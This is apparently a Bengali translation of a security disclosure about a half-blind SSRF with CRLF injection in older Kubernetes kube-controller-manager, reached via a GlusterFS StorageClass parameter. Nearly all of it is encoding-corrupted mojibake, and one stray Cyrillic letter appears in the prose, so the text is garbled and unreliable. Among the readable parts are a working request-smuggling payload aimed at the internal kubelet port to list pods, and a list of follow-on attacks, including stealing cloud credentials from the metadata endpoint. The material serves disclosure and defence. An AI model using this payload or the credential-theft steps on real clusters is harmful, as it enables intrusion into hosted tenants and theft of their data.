- PVC-āĻāĻ° āĻāĻ¨ā§āĻ¯ āĻŦāĻ°ā§āĻŖāĻ¨āĻž āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§ āĻ¸ā§āĻā§āĻ¯āĻžāĻ¨ā§āĻ° āĻĢāĻ˛āĻžāĻĢāĻ˛ āĻŦā§āĻ° āĻāĻ°ā§āĻ¨āĨ¤
āĻāĻ¨ā§āĻ¨āĻ¤ āĻĒāĻ°āĻŋāĻ¸ā§āĻĨāĻŋāĻ¤āĻŋ #3: āĻā§āĻŦāĻžāĻ°āĻ¨ā§āĻāĻ¸ āĻā§āĻ˛āĻžāĻ¸ā§āĻāĻžāĻ°ā§āĻ° "āĻĒā§āĻ°āĻžāĻ¨ā§" āĻ¸āĻāĻ¸ā§āĻāĻ°āĻŖā§ CRLF āĻāĻ¨āĻā§āĻāĻļāĻ¨ + āĻā§āĻ°āĻžāĻāĻžāĻ˛āĻžāĻ¨ HTTP
āĻ¯āĻĻāĻŋ āĻāĻāĻŋ āĻāĻžāĻĄāĻŧāĻžāĻ āĻĒā§āĻ°āĻĻāĻžāĻ¨āĻāĻžāĻ°ā§ āĻā§āĻ˛āĻžāĻ¯āĻŧā§āĻ¨ā§āĻāĻĻā§āĻ° K8s āĻā§āĻ˛āĻžāĻ¸ā§āĻāĻžāĻ°ā§āĻ° āĻĒā§āĻ°āĻžāĻ¨ā§ āĻ¸āĻāĻ¸ā§āĻāĻ°āĻŖ āĻ āĻĢāĻžāĻ° āĻāĻ°ā§ и āĻ¤āĻžāĻĻā§āĻ° kube-controller-manager-āĻāĻ° āĻ˛āĻāĻā§āĻ˛āĻŋāĻ¤ā§ āĻ ā§āĻ¯āĻžāĻā§āĻ¸ā§āĻ¸ āĻĻāĻŋāĻ¯āĻŧā§āĻā§, āĻĒā§āĻ°āĻāĻžāĻŦāĻāĻŋ āĻāĻ°āĻ āĻāĻ˛ā§āĻ˛ā§āĻāĻ¯ā§āĻā§āĻ¯ āĻšāĻ¯āĻŧā§ āĻāĻ ā§āĻā§āĨ¤
āĻāĻāĻāĻ¨ āĻāĻā§āĻ°āĻŽāĻŖāĻāĻžāĻ°ā§āĻ° āĻĒāĻā§āĻˇā§ āĻ¤āĻžāĻ° āĻŦāĻŋāĻŦā§āĻāĻ¨āĻžāĻ° āĻāĻŋāĻ¤ā§āĻ¤āĻŋāĻ¤ā§ āĻ¸āĻŽā§āĻĒā§āĻ°ā§āĻŖ HTTP āĻĒā§āĻ°āĻ¤āĻŋāĻā§āĻ°āĻŋāĻ¯āĻŧāĻž āĻĒāĻžāĻāĻ¯āĻŧāĻžāĻ° āĻāĻ¨ā§āĻ¯ āĻĄāĻŋāĻāĻžāĻāĻ¨ āĻāĻ°āĻž HTTP āĻ āĻ¨ā§āĻ°ā§āĻ§āĻā§āĻ˛āĻŋ āĻĒāĻ°āĻŋāĻŦāĻ°ā§āĻ¤āĻ¨ āĻāĻ°āĻž āĻ¸āĻ¤ā§āĻ¯āĻŋāĻ āĻ āĻ¨ā§āĻ āĻŦā§āĻļāĻŋ āĻ¸ā§āĻŦāĻŋāĻ§āĻžāĻāĻ¨āĻāĨ¤
āĻļā§āĻˇ āĻĻā§āĻļā§āĻ¯āĻāĻŋ āĻŦāĻžāĻ¸ā§āĻ¤āĻŦāĻžāĻ¯āĻŧāĻ¨ āĻāĻ°āĻ¤ā§, āĻ¨āĻŋāĻŽā§āĻ¨āĻ˛āĻŋāĻāĻŋāĻ¤ āĻļāĻ°ā§āĻ¤āĻā§āĻ˛āĻŋ āĻĒā§āĻ°āĻŖ āĻāĻ°āĻ¤ā§ āĻšāĻ¯āĻŧā§āĻāĻŋāĻ˛:
- āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ°āĻāĻžāĻ°ā§āĻ° āĻ āĻŦāĻļā§āĻ¯āĻ kube-āĻāĻ¨ā§āĻā§āĻ°ā§āĻ˛āĻžāĻ°-āĻŽā§āĻ¯āĻžāĻ¨ā§āĻāĻžāĻ° āĻ˛āĻāĻā§āĻ˛āĻŋāĻ¤ā§ āĻ ā§āĻ¯āĻžāĻā§āĻ¸ā§āĻ¸ āĻĨāĻžāĻāĻ¤ā§ āĻšāĻŦā§ (āĻ¯ā§āĻŽāĻ¨, āĻ¯ā§āĻŽāĻ¨, Azure LogInsights-āĻ)āĨ¤
- Kubernetes āĻā§āĻ˛āĻžāĻ¸ā§āĻāĻžāĻ° āĻ āĻŦāĻļā§āĻ¯āĻ 1.12 āĻāĻ° āĻā§āĻ¯āĻŧā§ āĻāĻŽ āĻā§āĻ˛āĻ āĻāĻ° āĻāĻāĻāĻŋ āĻ¸āĻāĻ¸ā§āĻāĻ°āĻŖ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°āĻŦā§ā§ˇ
āĻāĻŽāĻ°āĻž āĻāĻāĻāĻŋ āĻ¸ā§āĻĨāĻžāĻ¨ā§āĻ¯āĻŧ āĻĒāĻ°āĻŋāĻŦā§āĻļ āĻ¸ā§āĻĨāĻžāĻĒāĻ¨ āĻāĻ°ā§āĻāĻŋ āĻ¯āĻž GlusterFS Go āĻā§āĻ˛āĻžāĻ¯āĻŧā§āĻ¨ā§āĻ āĻāĻŦāĻ āĻāĻāĻāĻŋ āĻāĻžāĻ˛ āĻāĻžāĻ°ā§āĻā§āĻ āĻ¸āĻžāĻ°ā§āĻāĻžāĻ°ā§āĻ° āĻŽāĻ§ā§āĻ¯ā§ āĻ¯ā§āĻāĻžāĻ¯ā§āĻā§āĻ° āĻ āĻ¨ā§āĻāĻ°āĻŖ āĻāĻ°ā§ (āĻāĻŽāĻ°āĻž āĻāĻĒāĻžāĻ¤āĻ¤ PoC āĻĒā§āĻ°āĻāĻžāĻļ āĻāĻ°āĻž āĻĨā§āĻā§ āĻŦāĻŋāĻ°āĻ¤ āĻĨāĻžāĻāĻŦ)āĨ¤
āĻĒāĻžāĻāĻ¯āĻŧāĻž āĻāĻŋāĻ¯āĻŧā§āĻāĻŋāĻ˛
āĻāĻĒāĻ°ā§ āĻŦāĻ°ā§āĻŖāĻŋāĻ¤ āĻ āĻ°ā§āĻ§-āĻ āĻ¨ā§āĻ§ SSRF āĻāĻāĻ¤ā§āĻ°āĻŋāĻ¤ āĻāĻ°ā§ āĻāĻāĻ¸āĻā§āĻā§ āĻāĻāĻŋāĻ° āĻ¸āĻžāĻšāĻžāĻ¯ā§āĻ¯ā§, āĻāĻŽāĻ°āĻž āĻšā§āĻĄāĻžāĻ°, HTTP āĻĒāĻĻā§āĻ§āĻ¤āĻŋ, āĻĒā§āĻ¯āĻžāĻ°āĻžāĻŽāĻŋāĻāĻžāĻ° āĻāĻŦāĻ āĻĄā§āĻāĻž āĻĒā§āĻ°āĻ¤āĻŋāĻ¸ā§āĻĨāĻžāĻĒāĻ¨ āĻ¸āĻš āĻāĻŽāĻžāĻĻā§āĻ° āĻĒāĻāĻ¨ā§āĻĻ āĻ āĻ¨ā§āĻ¸āĻžāĻ°ā§ āĻ āĻ¨ā§āĻ°ā§āĻ§ āĻĒāĻžāĻ āĻžāĻ¤ā§ āĻ¸āĻā§āĻˇāĻŽ āĻšāĻ¯āĻŧā§āĻāĻŋāĻ˛āĻžāĻŽ, āĻ¯āĻž kube-controller-manager āĻ¤āĻžāĻ°āĻĒāĻ° āĻĒā§āĻ°āĻā§āĻ°āĻŋāĻ¯āĻŧāĻž āĻāĻ°ā§āĨ¤
āĻāĻāĻžāĻ¨ā§ āĻāĻāĻāĻŋ āĻĒā§āĻ¯āĻžāĻ°āĻžāĻŽāĻŋāĻāĻžāĻ°ā§ āĻāĻāĻāĻŋ āĻāĻžāĻ°ā§āĻ¯āĻāĻ°ā§ "āĻā§āĻĒ" āĻāĻ° āĻāĻāĻāĻŋ āĻāĻĻāĻžāĻšāĻ°āĻŖ resturl
StorageClass, āĻ¯āĻž āĻāĻāĻāĻŋ āĻ
āĻ¨ā§āĻ°ā§āĻĒ āĻāĻā§āĻ°āĻŽāĻŖ āĻĻā§āĻļā§āĻ¯āĻāĻ˛ā§āĻĒ āĻĒā§āĻ°āĻ¯āĻŧā§āĻ āĻāĻ°ā§:
http://172.31.X.1:10255/healthz? HTTP/1.1rnConnection: keep-
alivernHost: 172.31.X.1:10255rnContent-Length: 1rnrn1rnGET /pods? HTTP/1.1rnHost: 172.31.X.1:10255rnrn
āĻĢāĻ˛āĻžāĻĢāĻ˛ āĻāĻāĻāĻŋ āĻ¤ā§āĻ°ā§āĻāĻŋ āĻ āĻ¯āĻžāĻāĻŋāĻ¤ āĻĒā§āĻ°āĻ¤āĻŋāĻā§āĻ°āĻŋāĻ¯āĻŧāĻž, āĻāĻāĻāĻŋ āĻŦāĻžāĻ°ā§āĻ¤āĻž āĻ¯āĻž āĻ¨āĻŋāĻ¯āĻŧāĻžāĻŽāĻ āĻ˛āĻāĻā§āĻ˛āĻŋāĻ¤ā§ āĻ°ā§āĻāĻ°ā§āĻĄ āĻāĻ°āĻž āĻšāĻ¯āĻŧāĨ¤ āĻĄāĻŋāĻĢāĻ˛ā§āĻāĻ°ā§āĻĒā§ āĻāĻžāĻ°āĻŦā§āĻ¸āĻŋāĻāĻŋ āĻ¸āĻā§āĻˇāĻŽ āĻāĻ°āĻžāĻ° āĻāĻ¨ā§āĻ¯ āĻ§āĻ¨ā§āĻ¯āĻŦāĻžāĻĻ, HTTP āĻĒā§āĻ°āĻ¤āĻŋāĻā§āĻ°āĻŋāĻ¯āĻŧāĻž āĻŦāĻžāĻ°ā§āĻ¤āĻžāĻ° āĻŦāĻŋāĻˇāĻ¯āĻŧāĻŦāĻ¸ā§āĻ¤ā§āĻ āĻ¸ā§āĻāĻžāĻ¨ā§ āĻ¸āĻāĻ°āĻā§āĻˇāĻŋāĻ¤ āĻšāĻ¯āĻŧāĨ¤
āĻ§āĻžāĻ°āĻŖāĻžāĻ° āĻĒā§āĻ°āĻŽāĻžāĻŖā§āĻ° āĻāĻžāĻ āĻžāĻŽā§āĻ° āĻŽāĻ§ā§āĻ¯ā§ āĻāĻāĻŋ āĻāĻŋāĻ˛ āĻāĻŽāĻžāĻĻā§āĻ° āĻ¸āĻŦāĻā§āĻ¯āĻŧā§ āĻāĻžāĻ°ā§āĻ¯āĻāĻ° "āĻā§āĻĒ"āĨ¤
āĻāĻ āĻĒāĻĻā§āĻ§āĻ¤āĻŋāĻāĻŋ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§, āĻāĻŽāĻ°āĻž āĻŦāĻŋāĻāĻŋāĻ¨ā§āĻ¨ āĻĒāĻ°āĻŋāĻāĻžāĻ˛āĻŋāĻ¤ k8s āĻĒā§āĻ°āĻĻāĻžāĻ¨āĻāĻžāĻ°ā§āĻ° āĻā§āĻ˛āĻžāĻ¸ā§āĻāĻžāĻ°āĻā§āĻ˛āĻŋāĻ¤ā§ āĻ¨āĻŋāĻŽā§āĻ¨āĻ˛āĻŋāĻāĻŋāĻ¤ āĻāĻŋāĻā§ āĻāĻā§āĻ°āĻŽāĻŖ āĻāĻžāĻ˛āĻžāĻ¤ā§ āĻ¸āĻā§āĻˇāĻŽ āĻšāĻ¯āĻŧā§āĻāĻŋ: āĻŽā§āĻāĻžāĻĄā§āĻāĻž āĻĻā§āĻˇā§āĻāĻžāĻ¨ā§āĻ¤āĻā§āĻ˛āĻŋāĻ¤ā§ āĻļāĻāĻ¸āĻžāĻĒāĻ¤ā§āĻ° āĻ¸āĻš āĻŦāĻŋāĻļā§āĻˇāĻžāĻ§āĻŋāĻāĻžāĻ° āĻŦā§āĻĻā§āĻ§āĻŋ, etcd āĻŽāĻžāĻ¸ā§āĻāĻžāĻ° āĻĻā§āĻˇā§āĻāĻžāĻ¨ā§āĻ¤āĻā§āĻ˛āĻŋāĻ¤ā§ (āĻāĻ¨āĻāĻ¨āĻā§āĻ°āĻŋāĻĒā§āĻ āĻāĻ°āĻž) HTTP āĻ āĻ¨ā§āĻ°ā§āĻ§ā§āĻ° āĻŽāĻžāĻ§ā§āĻ¯āĻŽā§ āĻŽāĻžāĻ¸ā§āĻāĻžāĻ° DoS āĻāĻ¤ā§āĻ¯āĻžāĻĻāĻŋāĨ¤
āĻĒā§āĻ°āĻāĻžāĻŦ
SSRF āĻĻā§āĻ°ā§āĻŦāĻ˛āĻ¤āĻž āĻ¸āĻŽā§āĻĒāĻ°ā§āĻā§ āĻā§āĻŦāĻžāĻ°āĻ¨ā§āĻāĻ¸ā§āĻ° āĻ āĻĢāĻŋāĻ¸āĻŋāĻ¯āĻŧāĻžāĻ˛ āĻŦāĻŋāĻŦā§āĻ¤āĻŋāĻ¤ā§ āĻāĻŽāĻ°āĻž āĻāĻŦāĻŋāĻˇā§āĻāĻžāĻ° āĻāĻ°ā§āĻāĻŋ, āĻāĻāĻŋ āĻ°ā§āĻ āĻāĻ°āĻž āĻšāĻ¯āĻŧā§āĻā§ CVSS 6.3/10: CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N āĻ¯āĻĻāĻŋ āĻāĻŽāĻ°āĻž āĻļā§āĻ§ā§āĻŽāĻžāĻ¤ā§āĻ° āĻā§āĻŦāĻžāĻ°āĻ¨ā§āĻāĻ¸ āĻĒāĻ°āĻŋāĻ§āĻŋāĻ° āĻ¸āĻžāĻĨā§ āĻ¸āĻŽā§āĻĒāĻ°ā§āĻāĻŋāĻ¤ āĻĻā§āĻ°ā§āĻŦāĻ˛āĻ¤āĻž āĻŦāĻŋāĻŦā§āĻāĻ¨āĻž āĻāĻ°āĻŋ, āĻ āĻāĻŖā§āĻĄāĻ¤āĻž āĻā§āĻā§āĻāĻ° (āĻ āĻāĻŖā§āĻĄāĻ¤āĻž āĻā§āĻā§āĻāĻ°) āĻāĻāĻž āĻšāĻŋāĻ¸āĻžāĻŦā§ āĻ¯ā§āĻā§āĻ¯ āĻ¨āĻž.
āĻ¯āĻžāĻāĻšā§āĻ, āĻāĻāĻāĻŋ āĻĒāĻ°āĻŋāĻāĻžāĻ˛āĻŋāĻ¤ āĻĒāĻ°āĻŋāĻˇā§āĻŦāĻž āĻĒāĻ°āĻŋāĻŦā§āĻļā§āĻ° āĻĒāĻ°āĻŋāĻĒā§āĻ°ā§āĻā§āĻˇāĻŋāĻ¤ā§ āĻ¸āĻŽā§āĻāĻžāĻŦā§āĻ¯ āĻĒāĻ°āĻŋāĻŖāĻ¤āĻŋāĻā§āĻ˛āĻŋ āĻŽā§āĻ˛ā§āĻ¯āĻžāĻ¯āĻŧāĻ¨ āĻāĻ°āĻž (āĻāĻŦāĻ āĻāĻāĻŋ āĻāĻŽāĻžāĻĻā§āĻ° āĻāĻŦā§āĻˇāĻŖāĻžāĻ° āĻ¸āĻŦāĻā§āĻ¯āĻŧā§ āĻāĻāĻ°ā§āĻˇāĻŖā§āĻ¯āĻŧ āĻ āĻāĻļ āĻāĻŋāĻ˛!) āĻāĻŽāĻžāĻĻā§āĻ°āĻā§ āĻāĻāĻāĻŋ āĻ°ā§āĻāĻŋāĻāĻ¯āĻŧā§ āĻĻā§āĻ°ā§āĻŦāĻ˛āĻ¤āĻžāĻā§ āĻĒā§āĻ¨āĻ°āĻžāĻ¯āĻŧ āĻļā§āĻ°ā§āĻŖā§āĻŦāĻĻā§āĻ§ āĻāĻ°āĻ¤ā§ āĻĒā§āĻ°āĻ°ā§āĻāĻŋāĻ¤ āĻāĻ°ā§āĻāĻŋāĻ˛ āĻ¸āĻŽāĻžāĻ˛ā§āĻāĻ¨āĻžāĻŽā§āĻ˛āĻ CVSS10/10 āĻ āĻ¨ā§āĻ āĻĒāĻ°āĻŋāĻŦā§āĻļāĻāĻĻā§āĻ° āĻāĻ¨ā§āĻ¯āĨ¤
āĻā§āĻ˛āĻžāĻāĻĄ āĻĒāĻ°āĻŋāĻŦā§āĻļā§ āĻ¸āĻŽā§āĻāĻžāĻŦā§āĻ¯ āĻĒā§āĻ°āĻāĻžāĻŦāĻā§āĻ˛āĻŋ āĻŽā§āĻ˛ā§āĻ¯āĻžāĻ¯āĻŧāĻ¨ āĻāĻ°āĻžāĻ° āĻ¸āĻŽāĻ¯āĻŧ āĻāĻŽāĻžāĻĻā§āĻ° āĻŦāĻŋāĻŦā§āĻāĻ¨āĻžāĻā§āĻ˛āĻŋ āĻŦā§āĻāĻ¤ā§ āĻ¸āĻžāĻšāĻžāĻ¯ā§āĻ¯ āĻāĻ°āĻžāĻ° āĻāĻ¨ā§āĻ¯ āĻ¨ā§āĻā§ āĻ āĻ¤āĻŋāĻ°āĻŋāĻā§āĻ¤ āĻ¤āĻĨā§āĻ¯ āĻ°āĻ¯āĻŧā§āĻā§:
āĻ āĻāĻŖā§āĻĄāĻ¤āĻž
- āĻ āĻ°ā§āĻāĻŋāĻ¤ āĻ āĻā§āĻ¯āĻ¨ā§āĻ¤āĻ°ā§āĻŖ āĻļāĻāĻ¸āĻžāĻĒāĻ¤ā§āĻ° āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§ āĻĻā§āĻ°āĻŦāĻ°ā§āĻ¤ā§āĻāĻžāĻŦā§ āĻāĻŽāĻžāĻ¨ā§āĻĄāĻā§āĻ˛āĻŋ āĻāĻžāĻ˛āĻžāĻ¨āĨ¤
- āĻ¸ā§āĻĨāĻžāĻ¨ā§āĻ¯āĻŧ āĻ¨ā§āĻāĻāĻ¯āĻŧāĻžāĻ°ā§āĻā§ āĻĒāĻžāĻāĻ¯āĻŧāĻž āĻ āĻ¨ā§āĻ¯āĻžāĻ¨ā§āĻ¯ āĻ¸āĻāĻ¸ā§āĻĨāĻžāĻ¨āĻā§āĻ˛āĻŋāĻ° āĻ¸āĻžāĻĨā§ IDOR (āĻāĻ¨āĻ¸āĻŋāĻāĻŋāĻāĻ° āĻĄāĻžāĻāĻ°ā§āĻā§āĻ āĻ āĻŦāĻā§āĻā§āĻ āĻ°ā§āĻĢāĻžāĻ°ā§āĻ¨ā§āĻ¸) āĻĒāĻĻā§āĻ§āĻ¤āĻŋ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§ āĻāĻĒāĻ°ā§āĻ° āĻĻā§āĻļā§āĻ¯āĻāĻŋ āĻĒā§āĻ¨āĻ°ā§āĻ¤ā§āĻĒāĻžāĻĻāĻ¨ āĻāĻ°āĻžāĨ¤
āĻā§āĻĒāĻ¨ā§āĻ¯āĻŧāĻ¤āĻž
- āĻāĻā§āĻ°āĻŽāĻŖā§āĻ° āĻ§āĻ°āĻ¨
āĻĒāĻžāĻ°ā§āĻļā§āĻŦāĻŦāĻ°ā§āĻ¤ā§ āĻāĻ¨ā§āĻĻā§āĻ˛āĻ¨ āĻā§āĻ˛āĻžāĻāĻĄ āĻļāĻāĻ¸āĻžāĻĒāĻ¤ā§āĻ° āĻā§āĻ°āĻŋāĻ° āĻāĻ¨ā§āĻ¯ āĻ§āĻ¨ā§āĻ¯āĻŦāĻžāĻĻ (āĻāĻĻāĻžāĻšāĻ°āĻŖāĻ¸ā§āĻŦāĻ°ā§āĻĒ, āĻŽā§āĻāĻžāĻĄā§āĻāĻž API)āĨ¤ - āĻ¸ā§āĻĨāĻžāĻ¨ā§āĻ¯āĻŧ āĻ¨ā§āĻāĻāĻ¯āĻŧāĻžāĻ°ā§āĻ āĻ¸ā§āĻā§āĻ¯āĻžāĻ¨ āĻāĻ°ā§ āĻ¤āĻĨā§āĻ¯ āĻ¸āĻāĻā§āĻ°āĻš āĻāĻ°āĻž (SSH āĻ¸āĻāĻ¸ā§āĻāĻ°āĻŖ, HTTP āĻ¸āĻžāĻ°ā§āĻāĻžāĻ° āĻ¸āĻāĻ¸ā§āĻāĻ°āĻŖ, ...)āĨ¤
- āĻ
āĻā§āĻ¯āĻ¨ā§āĻ¤āĻ°ā§āĻŖ API āĻ¯ā§āĻŽāĻ¨ āĻŽā§āĻāĻžāĻĄā§āĻāĻž API (
http://169.254.169.254
,âĻ)āĨ¤ - āĻā§āĻ˛āĻžāĻāĻĄ āĻļāĻāĻ¸āĻžāĻĒāĻ¤ā§āĻ° āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§ āĻā§āĻ°āĻžāĻšāĻā§āĻ° āĻĄā§āĻāĻž āĻā§āĻ°āĻŋ āĻāĻ°āĻžāĨ¤
āĻāĻĒāĻ¸ā§āĻĨāĻŋāĻ¤āĻŋ
āĻāĻā§āĻ°āĻŽāĻŖ āĻā§āĻā§āĻāĻ° āĻ¸āĻŽā§āĻĒāĻ°ā§āĻāĻŋāĻ¤ āĻ¸āĻŽāĻ¸ā§āĻ¤ āĻļā§āĻˇāĻŖ āĻĒāĻ°āĻŋāĻ¸ā§āĻĨāĻŋāĻ¤āĻŋ āĻ āĻāĻŖā§āĻĄāĻ¤āĻž, āĻ§ā§āĻŦāĻāĻ¸āĻžāĻ¤ā§āĻŽāĻ āĻā§āĻ°āĻŋāĻ¯āĻŧāĻžāĻāĻ˛āĻžāĻĒā§āĻ° āĻāĻ¨ā§āĻ¯ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°āĻž āĻ¯ā§āĻ¤ā§ āĻĒāĻžāĻ°ā§ āĻāĻŦāĻ āĻā§āĻ˛āĻžāĻ¯āĻŧā§āĻ¨ā§āĻ āĻĒāĻ°āĻŋāĻ§āĻŋ (āĻŦāĻž āĻ āĻ¨ā§āĻ¯ āĻā§āĻ¨) āĻ āĻ¨ā§āĻĒāĻ˛āĻŦā§āĻ§ āĻĨā§āĻā§ āĻŽāĻžāĻ¸ā§āĻāĻžāĻ° āĻāĻĻāĻžāĻšāĻ°āĻŖ āĻšāĻ¤ā§ āĻĒāĻžāĻ°ā§āĨ¤
āĻ¯ā§āĻšā§āĻ¤ā§ āĻāĻŽāĻ°āĻž āĻāĻāĻāĻŋ āĻĒāĻ°āĻŋāĻāĻžāĻ˛āĻŋāĻ¤ K8s āĻĒāĻ°āĻŋāĻŦā§āĻļā§ āĻāĻŋāĻ˛āĻžāĻŽ āĻāĻŦāĻ āĻ āĻāĻŖā§āĻĄāĻ¤āĻžāĻ° āĻāĻĒāĻ° āĻĒā§āĻ°āĻāĻžāĻŦ āĻŽā§āĻ˛ā§āĻ¯āĻžāĻ¯āĻŧāĻ¨ āĻāĻ°āĻāĻŋ, āĻāĻŽāĻ°āĻž āĻāĻŽāĻ¨ āĻ āĻ¨ā§āĻ āĻĒāĻ°āĻŋāĻ¸ā§āĻĨāĻŋāĻ¤āĻŋ āĻāĻ˛ā§āĻĒāĻ¨āĻž āĻāĻ°āĻ¤ā§ āĻĒāĻžāĻ°āĻŋ āĻ¯āĻž āĻĒā§āĻ°āĻžāĻĒā§āĻ¯āĻ¤āĻžāĻā§ āĻĒā§āĻ°āĻāĻžāĻŦāĻŋāĻ¤ āĻāĻ°āĻ¤ā§ āĻĒāĻžāĻ°ā§āĨ¤ āĻ āĻ¤āĻŋāĻ°āĻŋāĻā§āĻ¤ āĻāĻĻāĻžāĻšāĻ°āĻŖāĻā§āĻ˛āĻŋāĻ° āĻŽāĻ§ā§āĻ¯ā§ etcd āĻĄāĻžāĻāĻžāĻŦā§āĻ¸āĻā§ āĻĻā§āĻˇāĻŋāĻ¤ āĻāĻ°āĻž āĻŦāĻž Kubernetes API-āĻ¤ā§ āĻāĻāĻāĻŋ āĻ¸āĻŽāĻžāĻ˛ā§āĻāĻ¨āĻžāĻŽā§āĻ˛āĻ āĻāĻ˛ āĻāĻ°āĻž āĻ āĻ¨ā§āĻ¤āĻ°ā§āĻā§āĻā§āĻ¤āĨ¤
āĻāĻžāĻ˛āĻ¨āĻŋāĻ°ā§āĻĒāĻŖ-āĻŦāĻŋāĻĻā§āĻ¯āĻž
- āĻĄāĻŋāĻ¸ā§āĻŽā§āĻŦāĻ° 6, 2019: āĻĻā§āĻ°ā§āĻŦāĻ˛āĻ¤āĻž MSRC āĻŦāĻžāĻ āĻŦāĻžāĻāĻ¨ā§āĻāĻŋāĻā§ āĻ°āĻŋāĻĒā§āĻ°ā§āĻ āĻāĻ°āĻž āĻšāĻ¯āĻŧā§āĻā§āĨ¤
- āĻāĻžāĻ¨ā§āĻ¯āĻŧāĻžāĻ°ā§ 3, 2020: āĻāĻāĻāĻŋ āĻ¤ā§āĻ¤ā§āĻ¯āĻŧ āĻĒāĻā§āĻˇ Kubernetes āĻĄā§āĻā§āĻ˛āĻĒāĻžāĻ°āĻĻā§āĻ° āĻāĻžāĻ¨āĻŋāĻ¯āĻŧā§āĻā§ āĻ¯ā§ āĻāĻŽāĻ°āĻž āĻāĻāĻāĻŋ āĻ¨āĻŋāĻ°āĻžāĻĒāĻ¤ā§āĻ¤āĻž āĻ¸āĻŽāĻ¸ā§āĻ¯āĻž āĻ¨āĻŋāĻ¯āĻŧā§ āĻāĻžāĻ āĻāĻ°āĻāĻŋāĨ¤ āĻāĻŦāĻ āĻ¤āĻžāĻĻā§āĻ° SSRF āĻā§ āĻ āĻā§āĻ¯āĻ¨ā§āĻ¤āĻ°ā§āĻŖ (āĻāĻ¨-āĻā§āĻ°) āĻĻā§āĻ°ā§āĻŦāĻ˛āĻ¤āĻž āĻšāĻŋāĻ¸āĻžāĻŦā§ āĻŦāĻŋāĻŦā§āĻāĻ¨āĻž āĻāĻ°āĻ¤ā§ āĻŦāĻ˛ā§āĻā§āĨ¤ āĻ¤āĻžāĻ°āĻĒāĻ°ā§ āĻāĻŽāĻ°āĻž āĻ¸āĻŽāĻ¸ā§āĻ¯āĻžāĻ° āĻāĻ¤ā§āĻ¸ āĻ¸āĻŽā§āĻĒāĻ°ā§āĻā§ āĻĒā§āĻ°āĻ¯ā§āĻā§āĻ¤āĻŋāĻāĻ¤ āĻŦāĻŋāĻŦāĻ°āĻŖ āĻ¸āĻš āĻāĻāĻāĻŋ āĻ¸āĻžāĻ§āĻžāĻ°āĻŖ āĻĒā§āĻ°āĻ¤āĻŋāĻŦā§āĻĻāĻ¨ āĻ¸āĻ°āĻŦāĻ°āĻžāĻš āĻāĻ°ā§āĻāĻŋāĨ¤
- āĻāĻžāĻ¨ā§āĻ¯āĻŧāĻžāĻ°ā§ 15, 2020: āĻāĻŽāĻ°āĻž Kubernetes āĻĄā§āĻā§āĻ˛āĻĒāĻžāĻ°āĻĻā§āĻ° āĻ¤āĻžāĻĻā§āĻ° āĻ āĻ¨ā§āĻ°ā§āĻ§ā§āĻ° āĻāĻŋāĻ¤ā§āĻ¤āĻŋāĻ¤ā§ āĻĒā§āĻ°āĻ¯ā§āĻā§āĻ¤āĻŋāĻāĻ¤ āĻāĻŦāĻ āĻ¸āĻžāĻ§āĻžāĻ°āĻŖ āĻ°āĻŋāĻĒā§āĻ°ā§āĻ āĻĒā§āĻ°āĻĻāĻžāĻ¨ āĻāĻ°ā§āĻāĻŋ (HackerOne āĻĒā§āĻ˛ā§āĻ¯āĻžāĻāĻĢāĻ°ā§āĻŽā§āĻ° āĻŽāĻžāĻ§ā§āĻ¯āĻŽā§)āĨ¤
- āĻāĻžāĻ¨ā§āĻ¯āĻŧāĻžāĻ°ā§ 15, 2020: Kubernetes āĻĄā§āĻā§āĻ˛āĻĒāĻžāĻ°āĻ°āĻž āĻāĻŽāĻžāĻĻā§āĻ° āĻāĻžāĻ¨āĻžāĻ¨ āĻ¯ā§ āĻ āĻ¤ā§āĻ¤ā§āĻ° āĻ°āĻŋāĻ˛āĻŋāĻā§āĻ° āĻāĻ¨ā§āĻ¯ āĻ āĻ°ā§āĻ§-āĻ āĻ¨ā§āĻ§ SSRF + CRLF āĻāĻ¨āĻā§āĻāĻļāĻ¨ āĻāĻāĻāĻŋ āĻ āĻ¨ā§āĻ¤āĻ°ā§āĻŽā§āĻā§ āĻĻā§āĻ°ā§āĻŦāĻ˛āĻ¤āĻž āĻšāĻŋāĻ¸āĻžāĻŦā§ āĻŦāĻŋāĻŦā§āĻāĻŋāĻ¤ āĻšāĻ¯āĻŧāĨ¤ āĻāĻŽāĻ°āĻž āĻ āĻŦāĻŋāĻ˛āĻŽā§āĻŦā§ āĻ āĻ¨ā§āĻ¯āĻžāĻ¨ā§āĻ¯ āĻĒāĻ°āĻŋāĻˇā§āĻŦāĻž āĻĒā§āĻ°āĻĻāĻžāĻ¨āĻāĻžāĻ°ā§āĻĻā§āĻ° āĻĒāĻ°āĻŋāĻ§āĻŋ āĻŦāĻŋāĻļā§āĻ˛ā§āĻˇāĻŖ āĻŦāĻ¨ā§āĻ§ āĻāĻ°ā§ āĻĻāĻŋāĻ¯āĻŧā§āĻāĻŋ: K8s āĻĻāĻ˛ āĻāĻāĻ¨ āĻŽā§āĻ˛ āĻāĻžāĻ°āĻŖ āĻ¨āĻŋāĻ¯āĻŧā§ āĻāĻžāĻ āĻāĻ°āĻā§āĨ¤
- 15 āĻāĻžāĻ¨ā§āĻ¯āĻŧāĻžāĻ°ā§, 2020: MSRC āĻĒā§āĻ°āĻ¸ā§āĻāĻžāĻ° HackerOne-āĻāĻ° āĻŽāĻžāĻ§ā§āĻ¯āĻŽā§ āĻā§āĻšā§āĻ¤ āĻšāĻ¯āĻŧā§āĻā§āĨ¤
